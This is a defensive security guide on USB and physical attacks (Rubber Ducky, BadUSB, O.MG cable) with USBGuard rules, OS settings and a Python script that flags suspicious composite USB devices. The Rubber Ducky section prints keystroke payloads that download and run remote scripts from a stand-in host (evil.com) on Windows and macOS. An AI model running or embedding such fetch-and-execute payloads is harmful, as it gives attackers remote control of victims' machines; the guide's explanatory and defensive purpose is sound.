Physical Security & Hardware Attacks
Defend against USB attacks, evil maid scenarios, DMA exploits, and hardware implants with FIDO2 keys, secure boot, and physical access controls.
USB Attack Vectors
The USB port is the most dangerous physical interface on your computer. It's designed to be universal and convenient, which means it's also universally exploitable.
USB Human Interface Device (HID) Attacks
The most common USB attack class exploits the fact that USB devices self-identify their type. A device that claims to be a keyboard IS a keyboard from the OS's perspective, and a keyboard can type any command.
USB Rubber Ducky
Hak5's USB Rubber Ducky looks like a standard USB flash drive but identifies itself as a keyboard. It types pre-programmed keystroke sequences at superhuman speed:
# DuckyScript: opens a reverse shell in under 3 seconds
DELAY 1000
GUI r # Windows+R (Run dialog)
DELAY 500
STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/shell.ps1')"
ENTER
# macOS variant:
DELAY 1000
GUI SPACE # Spotlight
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING curl http://evil.com/shell.sh | sh
ENTER
This executes in seconds. Leave your laptop unlocked at a coffee shop, someone plugs in a Rubber Ducky for 5 seconds, and your machine has a persistent backdoor.
BadUSB
BadUSB is more fundamental than the Rubber Ducky. It exploits the fact that USB controller firmware can be reprogrammed. A USB flash drive's controller can be reflashed to also identify as a keyboard, network adapter, or any other USB device class simultaneously.
BadUSB capabilities:
1. Keystroke injection (like Rubber Ducky)
2. Network interface emulation: becomes a fake network adapter that redirects traffic through the attacker's proxy
3. Mass storage + HID combo: mounts a drive AND types commands
4. Firmware persistence: survives reformatting the drive
O.MG Cable
The O.MG Cable is an attack tool disguised as a regular USB/Lightning cable. It contains a WiFi implant that lets an attacker remotely inject keystrokes:
Appearance: Identical to Apple Lightning cable
Capability: WiFi-enabled HID injection
Range: ~300 feet (direct) or unlimited via WiFi network
Cost: ~$120
Scenario: Attacker "accidentally" leaves a cable at a conference.
You pick it up, plug in your phone, and the cable has remote
control over your connected device.
USB Data Exfiltration
A USB device can exfiltrate data simply by being a storage device that auto-copies files when mounted. But it can also do so via USB networking: a USB device claiming to be an Ethernet adapter can:
1. Become the default network gateway
2. Respond to DHCP with itself as DNS
3. Capture all network traffic
4. Inject responses to redirect authenticated sessions
Defenses Against USB Attacks
Software Controls
# Linux: USBGuard, a whitelist of authorized USB devices
sudo apt install usbguard
# Generate a policy from the currently connected devices
# (root is needed to write /etc/usbguard/rules.conf), then reload the daemon
sudo sh -c 'usbguard generate-policy > /etc/usbguard/rules.conf'
sudo systemctl restart usbguard
# Rules example (/etc/usbguard/rules.conf):
allow id 05ac:8262 # Apple internal keyboard
allow id 1050:0407 # YubiKey 5
block # Block everything else
# macOS: No built-in USBGuard equivalent
# Use Santa (Google's security tool) or the Endpoint Security framework
# Or: System Preferences → Security → Accessories → "Ask for new devices"
# Windows: Group Policy
# Computer Configuration → Admin Templates → System → Device Installation
# "Prevent installation of devices not described by other policy settings"
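To make the BadUSB concern from earlier (a storage device that also enumerates as a keyboard) checkable against a USBGuard policy, here is an added Python example that is not part of the original page or of the USBGuard project. It parses constructed `usbguard list-devices` output, flags composite devices that mix HID with storage or network interfaces, and emits rules that pin each device to its exact interface set. The sample lines, the abcd:* vendor IDs and the "x"/"y" hashes are constructed; only the rule syntax is USBGuard's own.

```python
import re

# Constructed sample of `usbguard list-devices` output (not captured from a real host).
# 05ac:8262 and 1050:0407 are the IDs from the rules above; abcd:0001 and abcd:0002
# are made up, and "x"/"y" stand in for the real descriptor hashes.
SAMPLE = """\
2: allow id 05ac:8262 serial "" name "Apple Internal Keyboard" hash "x" parent-hash "y" via-port "1-1" with-interface { 03:01:01 03:00:00 } with-connect-type "hardwired"
3: allow id 1050:0407 serial "" name "YubiKey OTP+FIDO+CCID" hash "x" parent-hash "y" via-port "1-3" with-interface { 03:01:01 03:00:00 0b:00:00 } with-connect-type "hotplug"
4: allow id abcd:0001 serial "4C530001" name "Flash Drive" hash "x" parent-hash "y" via-port "1-4" with-interface 08:06:50 with-connect-type "hotplug"
5: allow id abcd:0002 serial "" name "Flash Drive" hash "x" parent-hash "y" via-port "2-1" with-interface { 08:06:50 03:01:01 } with-connect-type "hotplug"
"""

LINE_RE = re.compile(
    r'^\d+:\s+(?:allow|block|reject)\s+id\s+(?P<vid>[0-9a-f]{4}):(?P<pid>[0-9a-f]{4})'
    r'.*?\bname\s+"(?P<name>[^"]*)"'
    r'.*?with-interface\s+(?:\{\s*(?P<multi>[^}]*)\}|(?P<single>[0-9a-f]{2}:[0-9a-f]{2}:[0-9a-f]{2}))'
)

# USB base class codes: HID (keyboards), CDC / CDC-Data (network adapters), mass storage.
HID, CDC, CDC_DATA, MASS_STORAGE = 0x03, 0x02, 0x0A, 0x08
NON_HID_SUSPECTS = {CDC, CDC_DATA, MASS_STORAGE}

def parse_devices(text):
    """Return one dict per device: id, name, interface triples, and the set of base classes."""
    devices = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ifaces = (m["multi"] or m["single"]).split()
        devices.append({"id": f'{m["vid"]}:{m["pid"]}', "name": m["name"], "interfaces": ifaces,
                        "classes": {int(i.split(":")[0], 16) for i in ifaces}})
    return devices

def is_suspect_composite(dev):
    """BadUSB / O.MG pattern: a keyboard interface riding alongside storage or a network adapter."""
    return HID in dev["classes"] and bool(dev["classes"] & NON_HID_SUSPECTS)

def pinned_rule(dev):
    """Accept the device only with exactly the interface set seen at enrollment, so a reflashed
    controller that later adds a HID interface no longer matches the allow rule."""
    action = "reject" if is_suspect_composite(dev) else "allow"
    return f'{action} id {dev["id"]} with-interface equals {{ {" ".join(dev["interfaces"])} }}'

def audit(text):
    """One rule per listed device; reject lines mark devices that need a human look."""
    return [pinned_rule(d) for d in parse_devices(text)]

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE)))
```

A legitimate composite device (a keyboard with a built-in card reader, say) will also be rejected by this heuristic, which is the point: such devices should be allowed explicitly after inspection. USBGuard's generated rules additionally carry a descriptor hash, which is a stronger pin than VID:PID plus interface set.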
Physical Controls
1. USB port blockers: physical plugs that prevent insertion (easily defeated but raises the bar)
2. USB data blockers ("USB condoms"): allow charging only, block data pins. Essential for public charging stations.
3. Never use USB drives from unknown sources
4. Never use cables from unknown sources (O.MG Cable defense)
5. Lock your screen ALWAYS when stepping away
The Pragmatic Approach
For most engineers, the realistic defenses are:
- Always lock your screen (⌘L on macOS, Win+L on Windows)
- Never plug in unknown USB devices, not even to "check what's on it"
- Use a USB data blocker for public charging
- Carry your own cables; don't borrow random cables
- Enable macOS's Accessories security (Ventura+): "Ask for new accessories"